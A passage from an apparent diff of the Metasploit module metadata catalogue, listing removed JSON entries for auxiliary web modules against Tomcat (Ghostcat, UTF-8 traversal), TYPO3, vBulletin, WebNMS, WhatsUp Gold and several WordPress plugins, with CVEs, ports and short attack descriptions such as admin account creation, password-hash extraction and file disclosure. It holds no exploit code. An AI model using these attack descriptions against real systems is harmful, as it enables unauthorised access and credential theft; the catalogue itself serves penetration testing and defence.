The administration interface is included in versions 5.5 and lower.\n Port 8180 is the default for FreeBSD, 8080 for all others.", - "references": [ - "URL-http://tomcat.apache.org/" - ], - "platform": "", - "arch": "", - "rport": 8180, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/tomcat_administration.rb", - "is_install_path": true, - "ref_name": "admin/http/tomcat_administration", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/tomcat_ghostcat": { - "name": "Apache Tomcat AJP File Read", - "fullname": "auxiliary/admin/http/tomcat_ghostcat", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-02-20", - "type": "auxiliary", - "author": [ - "A Security Researcher of Chaitin Tech", - "SunCSR Team" - ], - "description": "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache\n Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection.\n If such connections are available to an attacker, they can be exploited in ways that may be surprising.\n\n In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP\n Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended\n in the security guide) that this Connector would be disabled if not required. This vulnerability report\n identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application -\n processing any file in the web application as a JSP. 
Further, if the web application allowed file upload\n and stored those files within the web application (or the attacker was able to control the content of the\n web application by some other means) then this, along with the ability to process a file as a JSP, made\n remote code execution possible.\n\n It is important to note that mitigation is only required if an AJP port is accessible to untrusted users.\n Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files\n and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were\n made to the default AJP Connector configuration in 9.0.31 to harden the default configuration.\n It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes\n to their configurations.", - "references": [ - "CVE-2020-1938", - "EDB-48143", - "URL-http://web.archive.org/web/20250114042903/https://www.chaitin.cn/en/ghostcat" - ], - "platform": "", - "arch": "", - "rport": 8009, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/tomcat_ghostcat.rb", - "is_install_path": true, - "ref_name": "admin/http/tomcat_ghostcat", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "Ghostcat" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/tomcat_utf8_traversal": { - "name": "Tomcat UTF-8 Directory Traversal Vulnerability", - "fullname": "auxiliary/admin/http/tomcat_utf8_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-01-09", - "type": "auxiliary", - "author": [ - "aushack ", - "guerrino di massa" - ], - "description": "This module tests whether a directory traversal vulnerability is present\n in versions of 
Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0\n - 6.0.16 under specific and non-default installations. The connector must have\n allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the\n vulnerability actually occurs within Java and not Tomcat; the server must\n use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java\n 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against\n RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change\n FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.", - "references": [ - "URL-http://tomcat.apache.org/", - "OSVDB-47464", - "CVE-2008-2938", - "URL-http://www.securityfocus.com/archive/1/499926" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb", - "is_install_path": true, - "ref_name": "admin/http/tomcat_utf8_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/trendmicro_dlp_traversal": { - "name": "TrendMicro Data Loss Prevention 5.5 Directory Traversal", - "fullname": "auxiliary/admin/http/trendmicro_dlp_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-01-09", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module tests whether a directory traversal vulnerability is present\n in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.\n The vulnerability appears to be actually caused by the Tomcat UTF-8\n bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.\n This module simply tests for the same bug with Trend Micro 
specific settings.\n Note that in the Trend Micro appliance, /etc/shadow is not used and therefore\n password hashes are stored and anonymously accessible in the passwd file.", - "references": [ - "URL-http://tomcat.apache.org/", - "OSVDB-47464", - "OSVDB-73447", - "CVE-2008-2938", - "URL-http://www.securityfocus.com/archive/1/499926", - "EDB-17388", - "BID-48225" - ], - "platform": "", - "arch": "", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb", - "is_install_path": true, - "ref_name": "admin/http/trendmicro_dlp_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/typo3_news_module_sqli": { - "name": "TYPO3 News Module SQL Injection", - "fullname": "auxiliary/admin/http/typo3_news_module_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-04-06", - "type": "auxiliary", - "author": [ - "Marco Rivoli", - "Charles Fol" - ], - "description": "This module exploits a SQL Injection vulnerability In TYPO3 NewsController.php\n in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary\n SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection\n can be used to obtain password hashes for application user accounts. This module has been\n tested on TYPO3 3.16.0 running news extension 5.0.0.\n\n This module tries to extract username and password hash of the administrator user.\n It tries to inject sql and check every letter of a pattern, to see\n if it belongs to the username or password it tries to alter the ordering of results. 
If\n the letter doesn't belong to the word being extracted then all results are inverted\n (News #2 appears before News #1, so Pattern2 before Pattern1), instead if the letter belongs\n to the word being extracted then the results are in proper order (News #1 appears before News #2,\n so Pattern1 before Pattern2)", - "references": [ - "CVE-2017-7581", - "URL-http://www.ambionics.io/blog/typo3-news-module-sqli" - ], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/typo3_news_module_sqli.rb", - "is_install_path": true, - "ref_name": "admin/http/typo3_news_module_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/typo3_sa_2009_001": { - "name": "TYPO3 sa-2009-001 Weak Encryption Key File Disclosure", - "fullname": "auxiliary/admin/http/typo3_sa_2009_001", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-01-20", - "type": "auxiliary", - "author": [ - "Chris John Riley" - ], - "description": "This module exploits a flaw in TYPO3 encryption ey creation process to allow for\n file disclosure in the jumpUrl mechanism. 
This flaw can be used to read any file\n that the web server user account has access to view.", - "references": [ - "CVE-2009-0255", - "OSVDB-51536", - "URL-http://blog.c22.cc/advisories/typo3-sa-2009-001", - "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/typo3_sa_2009_001.rb", - "is_install_path": true, - "ref_name": "admin/http/typo3_sa_2009_001", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/typo3_sa_2009_002": { - "name": "Typo3 sa-2009-002 File Disclosure", - "fullname": "auxiliary/admin/http/typo3_sa_2009_002", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-10", - "type": "auxiliary", - "author": [ - "spinbad " - ], - "description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n Typo3. 
This flaw can be used to read any file that the web server user account has\n access to.", - "references": [ - "OSVDB-52048", - "CVE-2009-0815", - "URL-http://web.archive.org/web/20090212165636/http://secunia.com:80/advisories/33829/", - "EDB-8038", - "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb", - "is_install_path": true, - "ref_name": "admin/http/typo3_sa_2009_002", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download arbitrary file" - } - ] - }, - "auxiliary_admin/http/typo3_sa_2010_020": { - "name": "TYPO3 sa-2010-020 Remote File Disclosure", - "fullname": "auxiliary/admin/http/typo3_sa_2010_020", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Chris John Riley", - "Gregor Kopf" - ], - "description": "This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.\n Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.\n This flaw can be used to read any file that the web server user account has access to view.", - "references": [ - "CVE-2010-3714", - "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020", - "URL-http://web.archive.org/web/20180126053019/http://gregorkopf.de/slides_berlinsides_2010.pdf" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-07 
12:36:11 +0000", - "path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb", - "is_install_path": true, - "ref_name": "admin/http/typo3_sa_2010_020", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/typo3_winstaller_default_enc_keys": { - "name": "TYPO3 Winstaller Default Encryption Keys", - "fullname": "auxiliary/admin/http/typo3_winstaller_default_enc_keys", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Chris John Riley" - ], - "description": "This module exploits known default encryption keys found in the TYPO3 Winstaller.\n This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be\n used to read any file that the web server user account has access to view.\n\n The method used to create the juhash (short MD5 hash) was altered in later versions\n of Typo3. Use the show actions command to display and select the version of TYPO3 in\n use (defaults to the older method of juhash creation).", - "references": [ - "URL-http://typo3winstaller.sourceforge.net/" - ], - "platform": "", - "arch": "", - "rport": 8503, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb", - "is_install_path": true, - "ref_name": "admin/http/typo3_winstaller_default_enc_keys", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "HMAC_SHA1", - "description": "TYPO3 4.2.15 (or later), 4.3.7 (or later), 4.4.4 (or later), 4.5.0 (or later)" - }, - { - "name": "MIME", - "description": "TYPO3 4.1.14 (or later), 4.2.13 - 4.2.14, 4.3.4 - 4.3.6, or 
4.4.1 - 4.4.3" - }, - { - "name": "Short_MD5", - "description": "TYPO3 4.1.13 (or earlier), 4.2.12 (or earlier), 4.3.3 (or earlier), or 4.4.0" - } - ] - }, - "auxiliary_admin/http/ulterius_file_download": { - "name": "Ulterius Server File Download Vulnerability", - "fullname": "auxiliary/admin/http/ulterius_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Rick Osgood", - "Jacob Robles" - ], - "description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n to download files from the affected host. A valid file path is needed to download a file.\n Fortunately, Ulterius indexes every file on the system, which can be stored in the\n following location:\n\n http://ulteriusURL:port/.../fileIndex.db.\n\n This module can download and parse the fileIndex.db file. There is also an option to\n download a file using a provided path.", - "references": [ - "EDB-43141", - "CVE-2017-16806" - ], - "platform": "", - "arch": "", - "rport": 22006, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/ulterius_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/ulterius_file_download", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/vbulletin_upgrade_admin": { - "name": "vBulletin Administrator Account Creation", - "fullname": "auxiliary/admin/http/vbulletin_upgrade_admin", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-09", - "type": "auxiliary", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module abuses the \"install/upgrade.php\" component on vBulletin 4.1+ and 4.5+ to\n create a new 
administrator account, as exploited in the wild on October 2013. This module\n has been tested successfully on vBulletin 4.1.5 and 4.1.0.", - "references": [ - "CVE-2013-6129", - "URL-http://blog.imperva.com/2013/10/threat-advisory-a-vbulletin-exploit-administrator-injection.html", - "OSVDB-98370", - "URL-http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb", - "is_install_path": true, - "ref_name": "admin/http/vbulletin_upgrade_admin", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/webnms_cred_disclosure": { - "name": "WebNMS Framework Server Credential Disclosure", - "fullname": "auxiliary/admin/http/webnms_cred_disclosure", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-07-04", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract\n all user credentials. The first vulnerability is an unauthenticated file download\n in the FetchFile servlet, which is used to download the file containing the user\n credentials. 
The second vulnerability is that the passwords in the file are\n obfuscated with a very weak algorithm which can be easily reversed.\n This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n Windows and Linux.", - "references": [ - "CVE-2016-6601", - "CVE-2016-6602", - "URL-https://blogs.securiteam.com/index.php/archives/2712", - "URL-https://seclists.org/fulldisclosure/2016/Aug/54" - ], - "platform": "", - "arch": "", - "rport": 9090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/webnms_cred_disclosure.rb", - "is_install_path": true, - "ref_name": "admin/http/webnms_cred_disclosure", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/webnms_file_download": { - "name": "WebNMS Framework Server Arbitrary Text File Download", - "fullname": "auxiliary/admin/http/webnms_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-07-04", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\n unauthenticated user to download files off the file system by using a directory\n traversal attack on the FetchFile servlet.\n Note that only text files can be downloaded properly, as any binary file will get\n mangled by the servlet. 
Also note that for Windows targets you can only download\n files that are in the same drive as the WebNMS installation.\n This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n Windows and Linux.", - "references": [ - "CVE-2016-6601", - "URL-https://blogs.securiteam.com/index.php/archives/2712", - "URL-https://seclists.org/fulldisclosure/2016/Aug/54" - ], - "platform": "", - "arch": "", - "rport": 9090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/webnms_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/webnms_file_download", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/whatsup_gold_sqli": { - "name": "WhatsUp Gold SQL Injection (CVE-2024-6670)", - "fullname": "auxiliary/admin/http/whatsup_gold_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-08-29", - "type": "auxiliary", - "author": [ - "Michael Heinzl", - "Sina Kheirkhah ( " - ], - "description": "This module exploits a SQL injection vulnerability in WhatsUp Gold, by changing the password of an existing user (such as of the default admin account)\n to an attacker-controlled one.\n\n WhatsUp Gold versions < v24.0.0 are affected.", - "references": [ - "CVE-2024-6670", - "URL-https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024", - "URL-https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-24-1185/" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": 
null, - "mod_time": "2024-09-26 04:01:36 +0000", - "path": "/modules/auxiliary/admin/http/whatsup_gold_sqli.rb", - "is_install_path": true, - "ref_name": "admin/http/whatsup_gold_sqli", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_automatic_plugin_privesc": { - "name": "WordPress Plugin Automatic Config Change to RCE", - "fullname": "auxiliary/admin/http/wp_automatic_plugin_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-09-06", - "type": "auxiliary", - "author": [ - "h00die", - "Jerome Bruandet" - ], - "description": "This module exploits an unauthenticated arbitrary wordpress options change vulnerability\n in the Automatic (wp-automatic) plugin <= 3.53.2. If WPEMAIL is provided, the administrator's email\n address will be changed. User registration is\n enabled, and default user role is set to administrator. A user is then created with\n the USER name set. 
A valid EMAIL is required to get the registration email (not handled in MSF).", - "references": [ - "URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/" - ], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-10-03 19:50:04 +0000", - "path": "/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_automatic_plugin_privesc", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ], - "NOCVE": [ - "Patched in 3.53.3 without vendor disclosure" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_custom_contact_forms": { - "name": "WordPress custom-contact-forms Plugin SQL Upload", - "fullname": "auxiliary/admin/http/wp_custom_contact_forms", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-08-07", - "type": "auxiliary", - "author": [ - "Marc-Alexandre Montpas", - "Christian Mehlmauer " - ], - "description": "The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download\n a SQL dump of the plugins database tables. It's also possible to upload files containing\n SQL statements which will be executed. 
The module first tries to extract the WordPress\n table prefix from the dump and then attempts to create a new admin user.", - "references": [ - "URL-http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html", - "URL-https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=", - "WPVDB-7542" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/wp_custom_contact_forms.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_custom_contact_forms", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_easycart_privilege_escalation": { - "name": "WordPress WP EasyCart Plugin Privilege Escalation", - "fullname": "auxiliary/admin/http/wp_easycart_privilege_escalation", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-02-25", - "type": "auxiliary", - "author": [ - "rastating" - ], - "description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n users of any user level to set any system option via a lack of validation in the\n ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n to prevent any notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default role to\n be administrator. 
This will allow for the user to create a new account with admin\n privileges via the default registration page found at /wp-login.php?action=register.", - "references": [ - "CVE-2015-2673", - "WPVDB-7808", - "URL-https://rastating.github.io/wp-easycart-privilege-escalation-information-disclosure/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_easycart_privilege_escalation", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_gdpr_compliance_privesc": { - "name": "WordPress WP GDPR Compliance Plugin Privilege Escalation", - "fullname": "auxiliary/admin/http/wp_gdpr_compliance_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-11-08", - "type": "auxiliary", - "author": [ - "Mikey Veenstra (WordFence)", - "Thomas Labadie" - ], - "description": "The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n wordpress administration options by overwriting values within the database.\n\n The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized\n users to trigger handlers and make configuration changes because of a failure to do\n capability checks when executing the 'save_setting' internal action.\n\n WARNING: The module sets Wordpress configuration options without reading their current\n values and restoring them later.", - "references": [ - "URL-https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/", - "CVE-2018-19207", - "WPVDB-9144" - ], - "platform": "", - 
"arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_gdpr_compliance_privesc", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [], - "Reliability": [], - "SideEffects": [ - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_google_maps_sqli": { - "name": "WordPress Google Maps Plugin SQL Injection", - "fullname": "auxiliary/admin/http/wp_google_maps_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-04-02", - "type": "auxiliary", - "author": [ - "Thomas Chauchefoin (Synacktiv)" - ], - "description": "This module exploits a SQL injection vulnerability in a REST endpoint\n registered by the WordPress plugin wp-google-maps between 7.11.00 and\n 7.11.17 (included).\n\n As the table prefix can be changed by administrators, set DB_PREFIX\n accordingly.", - "references": [ - "CVE-2019-10692", - "WPVDB-9249" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/wp_google_maps_sqli.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_google_maps_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_masterstudy_privesc": { - "name": "Wordpress MasterStudy Admin Account Creation", - "fullname": "auxiliary/admin/http/wp_masterstudy_privesc", - 
"aliases": [], - "rank": 300, - "disclosure_date": "2022-02-18", - "type": "auxiliary", - "author": [ - "h00die", - "Numan Türle" - ], - "description": "MasterStudy LMS, a WordPress plugin,\n prior to 2.7.6 is affected by a privilege escalation where an unauthenticated\n user is able to create an administrator account for wordpress itself.", - "references": [ - "CVE-2022-0441", - "URL-https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6", - "EDB-50752", - "WPVDB-173c2efe-ee9c-4539-852f-c242b4f728ed" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-10-13 10:13:27 +0000", - "path": "/modules/auxiliary/admin/http/wp_masterstudy_privesc.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_masterstudy_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_post_smtp_acct_takeover": { - "name": "Wordpress POST SMTP Account Takeover", - "fullname": "auxiliary/admin/http/wp_post_smtp_acct_takeover", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-01-10", - "type": "auxiliary", - "author": [ - "h00die", - "Ulysses Saicha" - ], - "description": "The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege\n escalation where an unauthenticated user is able to reset the password\n of an arbitrary user. 
This is done by requesting a password reset, then\n viewing the latest email logs to find the associated password reset email.", - "references": [ - "CVE-2023-6875", - "URL-https://github.com/UlyssesSaicha/CVE-2023-6875/tree/main" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-11-28 13:18:47 +0000", - "path": "/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_post_smtp_acct_takeover", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_symposium_sql_injection": { - "name": "WordPress Symposium Plugin SQL Injection", - "fullname": "auxiliary/admin/http/wp_symposium_sql_injection", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-08-18", - "type": "auxiliary", - "author": [ - "PizzaHatHacker", - "Matteo Cantoni " - ], - "description": "This module exploits a SQL injection vulnerability in the WP Symposium plugin\n before 15.8 for WordPress, which allows remote attackers to extract credentials\n via the size parameter to get_album_item.php.", - "references": [ - "CVE-2015-6522", - "EDB-37824" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 